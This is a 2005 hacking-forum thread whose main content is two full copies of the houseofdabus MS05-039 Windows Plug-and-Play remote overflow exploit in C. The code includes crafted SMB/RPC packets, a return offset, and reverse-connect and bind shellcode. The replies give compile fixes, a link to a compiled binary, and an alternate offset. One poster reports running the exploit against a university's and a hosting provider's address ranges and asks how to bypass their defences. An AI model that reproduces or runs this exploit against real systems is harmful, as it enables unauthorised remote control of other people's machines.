printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
if (argc < 3) {
printf("HOD-ms05039-pnp-expl.exe <host> <bindport> [connectback IP]\n");
exit(0);
}
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed\n");
exit(0);
}
printf("ok\n");
printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] bind pipe...");
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] sending crafted packet...");
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
if (argc > 3)
{
bindport = htons(atoi(argv[2]))^(USHORT)0x9999;
ip = inet_addr(argv[3])^(ULONG)0x99999999;
memcpy(&reverse_shellcode[118], &bindport, 2);
memcpy(&reverse_shellcode[111], &ip, 4);
memcpy(ptr, reverse_shellcode, sizeof(reverse_shellcode)-1);
}
else
{
// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
}
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
printf("ok\n");
if (argc > 3)
{
printf("[*] check your shell on %s:%i\n", argv[3], atoi(argv[2]));
}
else
{
printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
}
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
rpm
Aug 17 2005, 10:28 AM
Fancy working out a way to add multiple offsets
EviL
Aug 17 2005, 10:32 AM
QUOTE(pita @ Aug 17 2005, 10:24 AM) i was bored this morning so i thought why not make the like easier and this is the houseofdabus exploit modified with the 0x1013C79 ret and a reverse shellcode added. CODE
/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit (0x01013C79) + reverse and bind shellcode
*
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
* On Window XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
*
* ---------------------------------------------------------------------
* Solution:
* http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
*
* [*] connecting to 192.168.0.22:445...ok
* [*] null session...ok
* [*] bind pipe...ok
* [*] sending crafted packet...ok
* [*] check your shell on 192.168.0.1:7777
* Ctrl+C
*
* C:\>nc 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";
unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";
unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
/* browser */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
/* jmp over - entry point */
"\xEB\x08\x90\x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x79\x3C\x01\x01" /* 0x1013C79 pop reg, pop reg, ret*/
/* jmp ebx - umpnpmgr.dll
"\x6f\x36\x7a\x76" */
"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";
unsigned char reverse_shellcode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";
#define SET_PORTBIND_PORT(buf, port) \
*(unsigned short *)(((buf)+186)) = (port)
void
convert_name(char *out, char *name)
{
unsigned long len;
len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = '\x00';
*out-- = name[len];
}
}
int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned long ip;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
printf("\t Universal Exploit (0x01013C79) + reverse and bind shellcode\n\n\n");
printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
if (argc < 3) {
printf("HOD-ms05039-pnp-expl.exe <host> <bindport> [connectback IP]\n");
exit(0);
}
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
exit(0);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed\n");
exit(0);
}
printf("ok\n");
printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] bind pipe...");
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("\n[-] failed\n");
exit(0);
}
printf("ok\n");
printf("[*] sending crafted packet...");
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
if (argc > 3)
{
bindport = htons(atoi(argv[2]))^(USHORT)0x9999;
ip = inet_addr(argv[3])^(ULONG)0x99999999;
memcpy(&reverse_shellcode[118], &bindport, 2);
memcpy(&reverse_shellcode[111], &ip, 4);
memcpy(ptr, reverse_shellcode, sizeof(reverse_shellcode)-1);
}
else
{
// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
}
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("\n[-] send failed\n");
exit(0);
}
printf("ok\n");
if (argc > 3)
{
printf("[*] check your shell on %s:%i\n", argv[3], atoi(argv[2]));
}
else
{
printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
}
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
 I've tried to compile with cygwin and i have some errors 
tikbalang
Aug 17 2005, 10:38 AM
having problem too compiling this modified version.
may be a compiled version would help.
-tikz
PrOzHaCk
Aug 17 2005, 10:56 AM
to compile change USHORT with unsigned short and ULONG with unsigned long
Hehe0815
Aug 17 2005, 10:59 AM
*lol* sry was little bit confuiesd, but didnt get error while compiling, changed like above http://web270.cyberwebserver-04.de/expl.exe
majestic
Aug 17 2005, 11:20 AM
There's something that I can't solve maybe some of you can.
There are some ranges like (washington.edu) 128.95 that have some protection.
when I say protection I mean that the exploit doesn't affect their computers.
that what happens when you try:
[*] connecting to 128.95.x.x:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 128.95.x.x:7400
Account Deleted For Naming Targets
brOmstar
Aug 17 2005, 11:28 AM
How stupid are you? You tell us that you are trying to hack the University of Washington and also rackspace.com. Hope your account will get deleted as fast as possible.
The protection will be the patch...[Filtered by andydis]
majestic
Aug 17 2005, 11:36 AM
QUOTE(brOmstar @ Aug 17 2005, 11:28 AM) How stupid are you? You tell us that you are trying to hack the University of Washington and also rackspace.com. Hope your account will get deleted as fast as possible. The protection will be the patch...idiot. You see how idiot you are? you even don't know wtf i'm talking about. if its patched, it shouldn't be stucked idiot. anyway try it yourself before you talk like an [filtered by andydis] Edited by Andydis: Majestic try to respect all the users here, earned some warn points
apoc_neo
Aug 17 2005, 11:36 AM
QUOTE(majestic @ Aug 17 2005, 11:20 AM) There's something that I can't solve maybe some of you can. There are some ranges like (washington.edu) 128.95 that have some protection. when I say protection I mean that the exploit doesn't affect their computers. that what happens when you try: [*] connecting to 128.95.x.x:445...ok [*] null session...ok [*] bind pipe...ok [*] sending crafted packet...ok [*] check your shell on 128.95.x.x:7400 It stucks as usuall, but it never open the port on any of their computers. RACKSPACE.com servers have this protection either. How can I make this protection on my net-range and is it possible to pass it? if it is, how? wellp that wasn't all to smart... considering this is a whitehat forum... anyway i made autohacker for that reverse bindshell ppl if you are intersted and please keep your critisism to yourself thanks, oh and 10x pita for the mod http://www.governmentsecurity.org/forum/in...02&#entry124702
majestic
Aug 17 2005, 11:41 AM
QUOTE(apoc_neo @ Aug 17 2005, 11:36 AM) QUOTE(majestic @ Aug 17 2005, 11:20 AM) There's something that I can't solve maybe some of you can. There are some ranges like (washington.edu) 128.95 that have some protection. when I say protection I mean that the exploit doesn't affect their computers. that what happens when you try: [*] connecting to 128.95.x.x:445...ok [*] null session...ok [*] bind pipe...ok [*] sending crafted packet...ok [*] check your shell on 128.95.x.x:7400 It stucks as usuall, but it never open the port on any of their computers. RACKSPACE.com servers have this protection either. How can I make this protection on my net-range and is it possible to pass it? if it is, how? wellp that wasn't all to smart... considering this is a whitehat forum... anyway i made autohacker for that reverse bindshell ppl if you are intersted and please keep your critisism to yourself thanks, oh and 10x pita for the mod http://www.governmentsecurity.org/forum/in...02&#entry124702I just wanted to know how can I secure my net-range with that protection instead of patching all my servers one-by-one thats all. Thanks anyway, great job.
brOmstar
Aug 17 2005, 11:43 AM
You talked about hacking an universaty and also a provider that's what i know.
ps. you meant how to secure your owned boxes...if you are the admin of a BIG range you should now that a firewall should help or stop the pnp service or apply the patch via a batch or..or..or..but your try to fool us.
You hack other boxes to find out how to patch your boxes...try a better story!
majestic
Aug 17 2005, 11:53 AM
QUOTE(brOmstar @ Aug 17 2005, 11:43 AM) You talked about hacking an universaty and also a provider that's what i know. ps. you meant how to secure your owned boxes...if you are the admin of a BIG range you should now that a firewall should help or stop the pnp service or apply the patch via a batch or..or..or..but your try to fool us. You hack other boxes to find out how to patch your boxes...try a better story! I don't give a shit if you believe me or not. just stay away from me. ignore me.
Paul
Aug 17 2005, 11:56 AM
stay ontopic .. ??
Try this one:
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x6D\x24\x01\x01" /* 0x101246D NL */
It works on W2K ENG, but should also work on nl..
(its from xp-nl no sp)
BuzzDee
Aug 17 2005, 11:57 AM
